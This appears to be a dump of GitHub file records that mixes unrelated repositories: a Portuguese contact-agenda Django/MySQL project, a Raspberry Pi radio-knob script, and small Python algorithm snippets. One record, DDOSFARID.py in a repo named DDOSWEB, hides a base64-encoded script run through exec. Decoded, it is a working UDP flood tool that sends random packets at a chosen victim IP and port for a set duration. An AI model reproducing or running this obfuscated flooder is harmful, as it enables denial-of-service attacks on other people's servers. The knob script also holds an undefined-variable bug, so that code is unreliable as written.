"text": "Agenda\n======\n\n# Objetivo\n\nModelar uma agenda de contatos onde um contato possa se relacionar com outras pessoas, semelhante aos relacionamentos do Facebook e Google+.\n\nAlém disso o contato pode possuir vários endereços, telefones e tags. As tags servem para melhorar a identificação de cada contato.\n\n# Itens\n\n**mer.tex** é a modelagem conceitual (coloquei apenas as entidades). Para fazer este documento eu usei o [LaTeX][0] junto com o pacote [tikz-er2][2].\n\nPara compilar o documento use o comando\n\n\t$ latexmk -pdf mer.tex && latexmk -c\n\nPara converter o **pdf** em **jpg** use o [Imagemagick][3].\n\n\t$ convert -density 300 mer.pdf mer.jpg\n\n\n\n**modelagem.png** mostra as tabelas feitas no *Workbench*.\n\n\n\n**agenda_django.png** são as tabelas feitas no *Django*.\n\n\n\n**agenda_mysql_workbench.sql** é o schema exportado do *Workbench*.\n\n**agenda.sql** é o schema exportado do sqlite3.\n\n**models.py** é a *receita* de como fazer o modelo no *Django*.\n\n**admin.py** mostra em especial o uso do *TabularInline*.\n\n**Todo**: Leia [Como criar um site com formulário e lista em 30 minutos][1] e tente você mesmo recriar o modelo no Django.\n\n[0]: http://latexbr.blogspot.com.br/\n[1]: http://pythonclub.com.br/criar-site-com-form-lista-30-min.html\n[2]: https://bitbucket.org/pavel_calado/tikz-er2/wiki/Home\n[3]: http://grandeportal.blogspot.com.br/2012/06/editando-imagens-no-imagemagick.html"
},
{
"alpha_fraction": 0.7785235047340393,
"alphanum_fraction": 0.7852349281311035,
"avg_line_length": 29,
"blob_id": "44e9f1996a0782660dcffc515f5b5c91bbaeb1b7",
"content_id": "d6f4b1bde0f6a61b9695f835d3df606b4b741d0a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 149,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 5,
"path": "/pedido/pedido_project/pedido/admin.py",
"repo_name": "rg3915/banco_de_dados",
"src_encoding": "UTF-8",
"text": "# encoding: utf-8\nfrom pedido.models import *\nfrom django.contrib import admin\n\nadmin.site.register((Cliente, Produto, Categoria, Pedido, DetPedido))"
},
{
"alpha_fraction": 0.5481410622596741,
"alphanum_fraction": 0.5633937120437622,
"avg_line_length": 30.787878036499023,
"blob_id": "65cb947c552dab0691f398e2709991b2ebafc550",
"content_id": "fb94691224e3e5bc29f027d0e28edc55e8ce0e99",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 4196,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 132,
"path": "/agenda/agenda_mysql_workbench.sql",
"repo_name": "rg3915/banco_de_dados",
"src_encoding": "UTF-8",
"text": "SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;\nSET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;\nSET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';\n\nCREATE SCHEMA IF NOT EXISTS `agenda` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci ;\nUSE `agenda` ;\n\n-- -----------------------------------------------------\n-- Table `agenda`.`Contato`\n-- -----------------------------------------------------\nCREATE TABLE IF NOT EXISTS `agenda`.`Contato` (\n `id` INT NOT NULL,\n `confidencial` TINYINT(1) NULL,\n `tratamento` VARCHAR(100) NULL,\n `nome` VARCHAR(100) NULL,\n `sobrenome` VARCHAR(100) NULL,\n `nome_fantasia` VARCHAR(100) NULL,\n `razao_social` VARCHAR(100) NULL,\n `tipo_contato` VARCHAR(5) NULL,\n `cargo` VARCHAR(45) NULL,\n `email` VARCHAR(45) NULL,\n `cnpj` VARCHAR(13) NULL,\n `ie` VARCHAR(15) NULL,\n `cpf` VARCHAR(11) NULL,\n `rg` VARCHAR(15) NULL,\n `criado_em` DATETIME NULL,\n `modificado_em` DATETIME NULL,\n PRIMARY KEY (`id`))\nENGINE = InnoDB;\n\n\n-- -----------------------------------------------------\n-- Table `agenda`.`Relacionamento`\n-- -----------------------------------------------------\nCREATE TABLE IF NOT EXISTS `agenda`.`Relacionamento` (\n `id` INT NOT NULL,\n `contato_id` INT NOT NULL,\n `relaciona_com_id` INT NOT NULL,\n PRIMARY KEY (`id`),\n INDEX `fk_Relacionamento_Contato_idx` (`contato_id` ASC),\n INDEX `fk_Relacionamento_Contato1_idx` (`relaciona_com_id` ASC),\n CONSTRAINT `fk_Relacionamento_Contato`\n FOREIGN KEY (`contato_id`)\n REFERENCES `agenda`.`Contato` (`id`)\n ON DELETE NO ACTION\n ON UPDATE NO ACTION,\n CONSTRAINT `fk_Relacionamento_Contato1`\n FOREIGN KEY (`relaciona_com_id`)\n REFERENCES `agenda`.`Contato` (`id`)\n ON DELETE NO ACTION\n ON UPDATE NO ACTION)\nENGINE = InnoDB;\n\n\n-- -----------------------------------------------------\n-- Table `agenda`.`Endereco`\n-- -----------------------------------------------------\nCREATE TABLE IF NOT EXISTS `agenda`.`Endereco` (\n `id` INT NOT NULL,\n `contato_id` INT NOT NULL,\n `tipo_endereco` VARCHAR(1) NULL,\n `logradouro` VARCHAR(45) NULL,\n `complemento` VARCHAR(45) NULL,\n `bairro` VARCHAR(45) NULL,\n `cidade` VARCHAR(45) NULL,\n `estado` VARCHAR(45) NULL,\n `pais` VARCHAR(45) NULL,\n `cep` VARCHAR(45) NULL,\n PRIMARY KEY (`id`),\n INDEX `fk_Endereco_Contato1_idx` (`contato_id` ASC),\n CONSTRAINT `fk_Endereco_Contato1`\n FOREIGN KEY (`contato_id`)\n REFERENCES `agenda`.`Contato` (`id`)\n ON DELETE NO ACTION\n ON UPDATE NO ACTION)\nENGINE = InnoDB;\n\n\n-- -----------------------------------------------------\n-- Table `agenda`.`Fone`\n-- -----------------------------------------------------\nCREATE TABLE IF NOT EXISTS `agenda`.`Fone` (\n `id` INT NOT NULL,\n `contato_id` INT NOT NULL,\n `fone` VARCHAR(45) NULL,\n `tipo_fone` VARCHAR(45) NULL,\n PRIMARY KEY (`id`),\n INDEX `fk_Fone_Contato1_idx` (`contato_id` ASC),\n CONSTRAINT `fk_Fone_Contato1`\n FOREIGN KEY (`contato_id`)\n REFERENCES `agenda`.`Contato` (`id`)\n ON DELETE NO ACTION\n ON UPDATE NO ACTION)\nENGINE = InnoDB;\n\n\n-- -----------------------------------------------------\n-- Table `agenda`.`Tag`\n-- -----------------------------------------------------\nCREATE TABLE IF NOT EXISTS `agenda`.`Tag` (\n `id` INT NOT NULL,\n `tag` VARCHAR(45) NULL,\n PRIMARY KEY (`id`))\nENGINE = InnoDB;\n\n\n-- -----------------------------------------------------\n-- Table `agenda`.`Contato_Tag`\n-- -----------------------------------------------------\nCREATE TABLE IF NOT EXISTS `agenda`.`Contato_Tag` (\n `id` INT NOT NULL,\n `contato_id` INT NOT NULL,\n `tag_id` INT NOT NULL,\n PRIMARY KEY (`id`),\n INDEX `fk_Contato_Tag_Contato1_idx` (`contato_id` ASC),\n INDEX `fk_Contato_Tag_Tag1_idx` (`tag_id` ASC),\n CONSTRAINT `fk_Contato_Tag_Contato1`\n FOREIGN KEY (`contato_id`)\n REFERENCES `agenda`.`Contato` (`id`)\n ON DELETE NO ACTION\n ON UPDATE NO ACTION,\n CONSTRAINT `fk_Contato_Tag_Tag1`\n FOREIGN KEY (`tag_id`)\n REFERENCES `agenda`.`Tag` (`id`)\n ON DELETE NO ACTION\n ON UPDATE NO ACTION)\nENGINE = InnoDB;\n\n\nSET SQL_MODE=@OLD_SQL_MODE;\nSET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;\nSET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;\n"
}
] | 10 |
deenski/myRuneRadio | https://github.com/deenski/myRuneRadio | 385b2fd0ed71b5561f56eb33000e5b464aced691 | 7ac97d910c6613e672fe35530f52e4927b4649ee | 649d01158554f0bc61356cc8dc10dbed2cf494bd | refs/heads/master | 2021-01-17T19:23:51.100410 | 2016-08-07T02:53:00 | 2016-08-07T02:53:00 | 65,020,567 | 0 | 0 | null | 2016-08-05T13:28:42 | 2016-08-05T13:56:02 | 2016-08-05T14:11:21 | Python | [
{
"alpha_fraction": 0.6071121096611023,
"alphanum_fraction": 0.6208775639533997,
"avg_line_length": 29.990825653076172,
"blob_id": "ea18c27a653065b600a7bb866210e7154f41b025",
"content_id": "180b8129492838e0f09a3296cc96381de4ba1da1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3487,
"license_type": "permissive",
"max_line_length": 111,
"num_lines": 109,
"path": "/knob.py",
"repo_name": "deenski/myRuneRadio",
"src_encoding": "UTF-8",
"text": "\"\"\"Save this file as /var/www/command/knob.py\"\"\"\r\n\r\n#KY040 Python Class\r\n#base file from Martin O'Hanlon\r\n#stuffaboutcode.com\r\n\r\n\"\"\"Seriously, Martin's site is one of the best resources for RPi, python, coding help\r\nThank you Martin for providing the base of this file. My project wouldn't have\r\nworked, and I would be lost without this gem.\"\"\"\r\n\r\n#Increase Volume, Decrease Volume, Play, Pause, and Skip Track \r\n# functionality as well as doc strings by Jakob Vendegna\r\n\r\n\"\"\"This file is intended to run as a service on a Raspberry Pi using an mcp player like\r\nruneaudio (http://www.runeaudio.com/). The functionality of this file will allow a headless\r\nplayer, as should be with a RPi.\"\"\"\r\n\r\nimport RPi.GPIO as GPIO\r\nfrom time import sleep\r\nimport subprocess\r\n\r\n#start playing on boot\r\nsubprocess.call(['mpc','play'])\r\n\r\n\r\nclass KY040:\r\n \"\"\"in martin's file the clockwise and anti clockwise variables are opposite with CLOCKWISE = 0, etc...\r\n however this gave my ky040 the opposite functionality that I wanted. I am sure the variables are arbitrary,\r\n but I thought I would change it for the sake of my personal sanity. do what works for your project.\"\"\"\r\n CLOCKWISE = 1\r\n ANTICLOCKWISE = 0\r\n #button_counter tracks the number of times the switch on the ky040 has been pressed\r\n button_counter = 0\r\n \r\n def __init__(self, clockPin, dataPin, switchPin, rotaryCallback, switchCallback):\r\n #persist values\r\n self.clockPin = clockPin\r\n self.dataPin = dataPin\r\n self.switchPin = switchPin\r\n self.rotaryCallback = rotaryCallback\r\n self.switchCallback = switchCallback\r\n\r\n\r\n #setup pins\r\n GPIO.setup(clockPin, GPIO.IN)\r\n GPIO.setup(dataPin, GPIO.IN)\r\n GPIO.setup(switchPin, GPIO.IN, pull_up_down=GPIO.PUD_UP)\r\n \r\n\r\n def start(self):\r\n GPIO.add_event_detect(self.clockPin, GPIO.FALLING, callback=self._clockCallback, bouncetime=250)\r\n GPIO.add_event_detect(self.switchPin, GPIO.FALLING, callback=self._switchCallback, bouncetime=300)\r\n\r\n def stop(self):\r\n GPIO.remove_event_detect(self.clockPin)\r\n GPIO.remove_event_detect(self.switchPin)\r\n # when knob turned:\r\n def _clockCallback(self, pin):\r\n if GPIO.input(self.clockPin) == 0:\r\n data = GPIO.input(self.dataPin)\r\n if data == 1:\r\n self.rotaryCallback(self.ANTICLOCKWISE)\r\n subprocess.call(['mpc', 'volume', '-2'])\r\n else:\r\n self.rotaryCallback(self.CLOCKWISE)\r\n subprocess.call(['mpc', 'volume', '+2'])\r\n\r\n # when buttton pressed\r\n def _switchCallback(self, pin):\r\n if GPIO.input(self.switchPin) == 0:\r\n self.switchCallback()\r\n subprocess.call(['mpc','toggle'])\r\n track_Counter += 1\r\n print str(track_Counter)\r\n\r\n if track_Counter == 3:\r\n subprocess.call(['mpc','next'])\r\n track_Counter = 0\r\n\r\n\r\n\r\n#test\r\nif __name__ == \"__main__\":\r\n \r\n #set your pins here\r\n CLOCKPIN = 5\r\n DATAPIN = 6\r\n SWITCHPIN = 13\r\n\r\n def rotaryChange(direction):\r\n print \"turned - \" + str(direction)\r\n\r\n\r\n def switchPressed():\r\n print \"button pressed\"\r\n\r\n\r\n GPIO.setmode(GPIO.BCM)\r\n \r\n ky040 = KY040(CLOCKPIN, DATAPIN, SWITCHPIN, rotaryChange, switchPressed)\r\n\r\n ky040.start()\r\n\r\n try:\r\n while True:\r\n sleep(0.1)\r\n finally:\r\n ky040.stop()\r\n GPIO.cleanup()\r\n"
},
{
"alpha_fraction": 0.7425431609153748,
"alphanum_fraction": 0.7582417726516724,
"avg_line_length": 32.52631759643555,
"blob_id": "58619350ee8582ef2be88ca39d2112bc40411337",
"content_id": "4210990f4d3b87596348771ce98ccb5690050b1a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1274,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 38,
"path": "/README.md",
"repo_name": "deenski/myRuneRadio",
"src_encoding": "UTF-8",
"text": "# myRuneRadio\nEverything you need to upcycle an antique radio into a streaming music player\nIntended as a basic one button functionality radio. Keep it simple. You can easily add more functionality.\nThis will only work using runeaudio and a ky040 rotary encoder in conjunction with a Hifiberry AMP+\n\n##Instructions\nDownload and flash runeaudio to a raspberry pi\nInstall the amp hat\ninstall the ky040 rotary encoder, and hook up to gpio pins (BCM mode)\n+3 volts\ncommon\n###Clock Pin - gpio 5\n###Data Pin - gpio 6\n###Switch Pin - gpio 13\nthese pins are very easy to locate, if you don't understand where they are, simply \nhold the raspberry pi in your hand with the USB slots facing the ceiling.\ncount 1,2,3,4 pins up on the left side.\nthe 4th pin is 13, the one above that is 6, and the one above that is 5\n\nboot it up\nonce booted pull this mother\n\nthenrun:\n[code]\nsudo cp /path-where-this-repo-is-saved-on-your-pi/knob.py /var/www/command/knob.py\n\nsudo cp /path-where-this-repo-is-saved-on-your-pi/knob.service /usr/lib/systemd/system/knob.service\n\n\"\"\"start the service for testing\"\"\"\nsystemctl start knob.service\n\n\"\"\"if it works as expected\"\"\"\nsystemctl enable knob.service\n\n\"\"\" if not: \"\"\"\nsystemctl stop knob.service\n\"\"\" and figure out what you're doing wrong.\"\"\"\n[/code]\n"
}
] | 2 |
DARKFARID13/DDOSWEB | https://github.com/DARKFARID13/DDOSWEB | 146b4ca30a85062afd9d75e9b6451b8243ab5b7c | ba28abaad211098a384394c6fc19f027b5e23fd4 | d0729088e482931aa3cfd017ad151f07244cdfa6 | refs/heads/master | 2020-07-24T07:13:22.124093 | 2019-09-11T15:10:41 | 2019-09-11T15:10:41 | 207,841,758 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.739130437374115,
"alphanum_fraction": 0.739130437374115,
"avg_line_length": 10.5,
"blob_id": "3a81843cb21a50f2d2bc88ba4c8e4904ee720514",
"content_id": "8defbbc5c3cb5e5d60d1af49b47767905bbf1e18",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 23,
"license_type": "permissive",
"max_line_length": 12,
"num_lines": 2,
"path": "/README.md",
"repo_name": "DARKFARID13/DDOSWEB",
"src_encoding": "UTF-8",
"text": "# DDOSWEB\nDdos web cuk\n"
},
{
"alpha_fraction": 0.6222222447395325,
"alphanum_fraction": 0.7555555701255798,
"avg_line_length": 22,
"blob_id": "fcd1c648fac0b55526c3e8d8ec9d581b42ebff29",
"content_id": "98d4a6f974fc89484c35fa782c6605edd9a0de88",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 45,
"license_type": "permissive",
"max_line_length": 31,
"num_lines": 2,
"path": "/DDOSFARID.py",
"repo_name": "DARKFARID13/DDOSWEB",
"src_encoding": "UTF-8",
"text": "import base64\nexec(base64.b64decode('aW1wb3J0IHRpbWUKaW1wb3J0IHNvY2tldAppbXBvcnQgcmFuZG9tCmltcG9ydCBzeXMKZGVmIHVzYWdlKCk6CiAgICBwcmludCAiXDAzM1sxOzMybSMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyIKICAgIHByaW50ICIjLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1bXDAzM1sxOzkxbUZBUklELURET1NcMDMzWzE7MzJtXS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tIyIKICAgIHByaW50ICIjLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLSMiCiAgICBwcmludCAiIyAgIFwwMzNbMTs5MW1Db21tYW5kOiAiICJweXRob24yIFRhbWZhbkRkb3MucHkgIiAiPGlwPiA8cG9ydD4gPHBhY2tldD4gXDAzM1sxOzMybSAjIgogICAgcHJpbnQgIiMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICMjIgogICAgcHJpbnQgIiNcMDMzWzE7OTFtQ3JlYXRvcjpNUi5GNFIxRCAgXDAzM1sxOzMybSMjICAgICAgIyAgICAgICMgICAgICAgICAgICAgICAgICAgICAjIyIKICAgIHByaW50ICIjXDAzM1sxOzkxbVRlYW0gICA6IE1DSSAgICAgICAgXDAzM1sxOzMybSMjICAgICAjICAgICAgIyAgICAgICAgICAgICAgICAgICAgICMjIgogICAgcHJpbnQgIiNcMDMzWzE7OTFtVmVyc2lvbjoxLjAgICAgICAgIFwwMzNbMTszMm0jIyAgICAgICMgICAgICAjICAgICAgICAgICAgICAgICAgICAgIyMiCiAgICBwcmludCAiI1wwMzNbMTs5MW1UUUFkbWluOk1SLkY0UjFEWC1NclJhcGhhZWwtTXJUaGVTcGFtLU1yLkRjLU1yQmxhY2tIYXQgICMjIgogICAgcHJpbnQgIiNcMDMzWzE7OTFtICAgICAgIDpMaWtlV2hpdGUtTXJVa25vd24tTXJTYW5jaGV6LU1yQmltYm9uZy1NclRhbWZhbiAjIyIKICAgIHByaW50ICIjICAgICAgICAgICAgICAgICAgICAgXDAzM1sxOzkxbSAjIyAgICAgXDAzM1sxOzMybSMgIFwwMzNbMTs5MW0gIFwwMzNbMTszMiAgICMjIgogICAgcHJpbnQgIiMgICAgICAgICAgICAgICAgICAgICBcMDMzWzE7OTFtIyMgIFwwMzNbMTszMm0jIyMgICBcMDMzWzE7OTFtICBcMDMzWzE7MzJtICAgIyMiCiAgICBwcmludCAiIyAgICAgICAgICAgICAgIFwwMzNbMTs5MW08LS1bTVVTTElNIENZQkVSIElORE9ORVNJQV0tLT4gICAgICAgICBcMDMzWzE7MzJtICAjIyIKICAgIHByaW50ICIjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMiCiAgICBwcmludCAiICAgICBNZW1iZXI6TXIuWmVlWF9JTkQtSy5SLkEuUy1FZWxlaElORC1XaG9BbUktV2V5dC5UbSIKICAgIHByaW50ICIgICAgICAgICAgIFBlbWJ1YXREZG9zMTpNUi5GNFIxRDE5ODcgQ3liZXIgVGVhbSIKICAgIHByaW50ICIgICAgICAgICAgUGVtYnVhdERkb3MyOk11c2xpbSBDeWJlciBJbmRvbmVzaWEiCmRlZiBmbG9vZCh2aWN0aW0sIHZwb3J0LCBkdXJhdGlvbik6CiAgICAjIFN1cHBvcnQgdXMgeWFha2suLi4gOikKICAgICMgT2tleSBKYWRpIGRpc2luaSBzYXlhIG1lbWJ1YXQgc2VydmVyLCBLZXRpa2Egc2F5YSBtZW1hbmdnaWwgIlNPQ0tfREdSQU0iIGl0dSAgbWVudW5qdWtrYW4gIFVEUCB0eXBlIHByb2dyYW0KICAgIGNsaWVudCA9IHNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX0RHUkFNKQogICAgIyAyMDAwMCByZXByZXNlbnRhc2kgc2F0dSBieXRlIGtlIHNlcnZlcgogICAgYnl0ZXMgPSByYW5kb20uX3VyYW5kb20oMjAwMDApCiAgICB0aW1lb3V0ID0gIHRpbWUudGltZSgpICsgZHVyYXRpb24KICAgIHNlbnQgPSAzMDAwCgogICAgd2hpbGUgMToKICAgICAgICBpZiB0aW1lLnRpbWUoKSA+IHRpbWVvdXQ6CiAgICAgICAgICAgIGJyZWFrCiAgICAgICAgZWxzZToKICAgICAgICAgICAgcGFzcwogICAgICAgIGNsaWVudC5zZW5kdG8oYnl0ZXMsICh2aWN0aW0sIHZwb3J0KSkKICAgICAgICBzZW50ID0gc2VudCArIDEKICAgICAgICBwcmludCAiXDAzM1sxOzkxbU1lbXVsYWkgXDAzM1sxOzMybSVzIFwwMzNbMTs5MW1tZW5naXJpbSBwYWtldCBcMDMzWzE7MzJtJXMgXDAzM1sxOzkxbXBhZGEgcG9ydCBcMDMzWzE7MzJtJXMgIiUoc2VudCwgdmljdGltLCB2cG9ydCkKZGVmIG1haW4oKToKICAgIHByaW50IGxlbihzeXMuYXJndikKICAgIGlmIGxlbihzeXMuYXJndikgIT0gNDoKICAgICAgICB1c2FnZSgpCiAgICBlbHNlOgogICAgICAgIGZsb29kKHN5cy5hcmd2WzFdLCBpbnQoc3lzLmFyZ3ZbMl0pLCBpbnQoc3lzLmFyZ3ZbM10pKQoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIG1haW4oKQoK'))"
}
] | 2 |
jamie-kieran-martin/320_Python | https://github.com/jamie-kieran-martin/320_Python | fc6196a1b09e22b25e7543b13ee95cd6e1f22d3b | fee65aac1940a637ccdbd2ae6506911ddc1e966e | b9d579dfbf5c946ca84cc8d78182ca562620fa8b | refs/heads/master | 2022-10-24T15:05:07.646087 | 2020-06-16T10:48:16 | 2020-06-16T10:48:16 | 271,412,434 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.3210526406764984,
"alphanum_fraction": 0.378947377204895,
"avg_line_length": 30.83333396911621,
"blob_id": "a32084aeb92bb421e5645fc1a0fd3d50905b11d8",
"content_id": "e4d25139afb54f75ae9e006b4c5c8d16fd57f645",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 190,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 6,
"path": "/information_gain.py",
"repo_name": "jamie-kieran-martin/320_Python",
"src_encoding": "UTF-8",
"text": "from math import log2\n\nH = lambda p, n: (-p / (p + n)) * log2(p / (p + n)) + (-n / (p + n)) * log2(n / (p + n))\n\nif __name__ == \"__main__\":\n print(((3 / 6) * H(2, 1) + (3 / 6) * H(1, 2)))"
},
{
"alpha_fraction": 0.4134419560432434,
"alphanum_fraction": 0.5010183453559875,
"avg_line_length": 20.34782600402832,
"blob_id": "0f62705e8449921dda04addf940cea051fa9cd86",
"content_id": "33e6d5a46b6146e118be2a1312e9544e7e95cabb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 491,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 23,
"path": "/q_learning.py",
"repo_name": "jamie-kieran-martin/320_Python",
"src_encoding": "UTF-8",
"text": "Q_table = [\n [0, 1, 2, 3],\n [1, 0.1, 0.5, 0.9],\n [2, 0.2, 0.6, 1.0],\n [3, 0.3, 0.7, 1.1],\n [4, 0.4, 0.8, 1.2]\n]\n\n# Q_table is flipped so that we can use array slices [1:]\n\n# set external values here\nlearning_rate = 0.2\ndiscount = 0.9\nreward = 1\nsn = 2\n# sn = new state\n\n# s = old state, a = action\nQ = lambda s, a: (1 - learning_rate) * Q_table[s][a] + learning_rate * (\n reward + discount * max(Q_table[sn][1:]))\n\nif __name__ == \"__main__\":\n print(Q(3, 1))\n"
},
{
"alpha_fraction": 0.45161867141723633,
"alphanum_fraction": 0.47343945503234863,
"avg_line_length": 28.898395538330078,
"blob_id": "426337fef0e5ea728c81f7b3460c5474d4ae062f",
"content_id": "c2a812524187b7503884df7f216d32fd2aeb665f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5591,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 187,
"path": "/levenshtein.py",
"repo_name": "jamie-kieran-martin/320_Python",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n\ndef lev(a,\n b,\n insert_cost=lambda x: 1,\n delete_cost=lambda x: 2,\n match_cost=lambda x, y: 0 if x == y else 4):\n '''\n Compute in a purely recursive fashion\n the Levenshtein distance between\n two sequences a and b\n @param\n a : sequence\n b : sequence\n insert_cost : insert cost function ,\n delete_cost : deletion cost function ,\n match_cost : match cost function\n '''\n\n if a:\n # cost of inserting all elements of sequence b\n return sum([insert_cost(y) for y in b])\n if b:\n # cost of deleting all elements of sequence a\n return sum([delete_cost(x) for x in a])\n\n # the sequences a and b are non-empty\n return min(\n lev(a[:-1], b[:-1]) + match_cost(a[-1], b[-1]),\n lev(a, b[:-1]) + insert_cost(b[-1]),\n lev(a[:-1], b) + delete_cost(a[-1])\n )\n\n\n# edit operation codes\ndict_op = {0: 'match', 1: 'insert', 2: 'delete',\n 'match': 0, 'insert': 1, 'delete': 2}\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\ndef dynprog(x,\n y,\n insert_cost=lambda c: 1,\n delete_cost=lambda c: 2,\n match_cost=lambda cx, cy: 0 if cx == cy else 4):\n '''\n Compute the Levenshtein distance between the two sequences x and y\n @param\n x : sequence\n y : sequence\n insert_cost : insert cost function ,\n delete_cost : deletion cost function ,\n match_cost = match cost function\n\n Compute the cost of editing sequence x into sequence y.\n Let nx , ny = len(x) , len(y)\n Sequence x is indexed from 0 to nx-1 (similar remark for y).\n M[nx,ny] is the cost of editing from x to y\n Note that M[0,3] is the cost of matching the empty string to the first\n 3 characters of sequence y.\n\n\n @return\n M,P\n where\n M is the DP cost matrix\n M[i,j] : cost of matching x[:i] to y[:j]\n Note that x[i] and y[j] are not taken into account for M[i,j]\n M[nx,ny] : cost of matching x[:nx] to y[:ny]\n and\n P is the parent array to trace back the edit sequence\n P is used by the function 'explain_seq'\n '''\n\n nx = len(x)\n ny = len(y)\n\n # Cost matrix M\n # M[i,j] cost of matching the slice x[:i] to the slice y[:j]\n # M[nx,ny] will be the cost of matching the whole sequences\n M = np.zeros((nx + 1, ny + 1), dtype=float)\n\n # P[i,j] indicates to op code use for the last optimal operation\n # in matching the slice x[:i] to the slice y[:j]\n P = np.zeros((nx + 1, ny + 1), dtype=int) # parent\n\n M[1:, 0] = np.cumsum([delete_cost(c) for c in x])\n P[1:, 0] = dict_op['delete'] # delete op code\n\n M[0, 1:] = np.cumsum([insert_cost(c) for c in y])\n P[0, 1:] = dict_op['insert'] # insert op code\n\n for ix in range(1, nx + 1):\n for iy in range(1, ny + 1):\n # print('ix {} iy {} '.format(ix,iy) )\n # M[ix][iy] cost of matching\n # x[:ix] =x[0],..,x[ix-1 to y[:iy] = y[0],..,y[iy-1]\n L = [M[ix - 1, iy - 1] + match_cost(x[ix - 1], y[iy - 1]), # match x[ix-1] and y[iy-1]\n M[ix, iy - 1] + insert_cost(y[iy - 1]), # insert y[iy-1]\n M[ix - 1, iy] + delete_cost(x[ix - 1])] # delete x[ix-1]\n i_min = np.argmin(L)\n P[ix][iy] = i_min\n M[ix][iy] = L[i_min]\n return M, P\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\ndef explain_dynprog(x, y, M, P):\n '''\n Retrieve the optimal sequence of edit operations given\n the dyn prog tables M,P\n @pre\n M,P have been computed by 'dynprog'\n '''\n nx = len(x)\n ny = len(y)\n L = []\n ix, iy = nx, ny\n while ix > 0 and iy > 0:\n if P[ix, iy] == 0: # 'match op':\n L.append(' match {} and {} '.format(x[ix - 1], y[iy - 1]))\n ix -= 1\n iy -= 1\n elif P[ix, iy] == 1: # 'insert op'\n L.append('insert ' + str(y[iy - 1]))\n iy -= 1\n else: # 'delete op'\n L.append('delete ' + str(x[ix - 1]))\n ix -= 1\n # print('<A> ix = {} iy = {} '.format(ix,iy) )\n while ix > 0:\n L.append('delete ' + str(x[ix - 1]))\n ix -= 1\n while iy > 0:\n L.append('insert ' + str(y[iy - 1]))\n iy -= 1\n\n return list(reversed(L))\n\n\ndef levenshtein(seq1, seq2):\n size_x = len(seq1) + 1\n size_y = len(seq2) + 1\n matrix = np.zeros((size_x, size_y))\n\n for x in range(size_x):\n matrix[x, 0] = x\n for y in range(size_y):\n matrix[0, y] = y\n\n for x in range(1, size_x):\n for y in range(1, size_y):\n if seq1[x - 1] == seq2[y - 1]:\n matrix[x, y] = min(\n matrix[x - 1, y] + 1,\n matrix[x - 1, y - 1],\n matrix[x, y - 1] + 1\n )\n else:\n matrix[x, y] = min(\n matrix[x - 1, y] + 1,\n matrix[x - 1, y - 1] + 1,\n matrix[x, y - 1] + 1\n )\n\n print(matrix)\n\n return matrix[size_x - 1, size_y - 1]\n\n\nif __name__ == \"__main__\":\n w1, w2 = 'sunda', 'satu'\n\n print('w1 = {}'.format(w1))\n print('w2 = {}'.format(w2))\n\n M, P = dynprog(w1, w2,\n insert_cost=lambda c: 1,\n delete_cost=lambda c: 2,\n match_cost=lambda cx, cy: 0 if cx == cy else 4)\n\n L = explain_dynprog(w1, w2, M, P)\n print(L)\n print(levenshtein(w1, w2))\n"
}
] | 3 |
dbordak/RU-Food-Scraper | https://github.com/dbordak/RU-Food-Scraper | 3c8cb4df5eb8fc5b1cbdb1859d3165b9770076df | e6633fb6d457c1796c58545563df00751791aaa8 | dcdc93e5863e5a27a44a391adcf7467cca969ebd | refs/heads/master | 2021-01-21T03:13:21.602033 | 2014-05-08T21:38:27 | 2014-05-08T22:07:04 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.553415060043335,
"alphanum_fraction": 0.5621716380119324,
"avg_line_length": 12.619047164916992,
"blob_id": "e0bf4a472acc9bafe81b74dbbd5e0d3960c4890d",
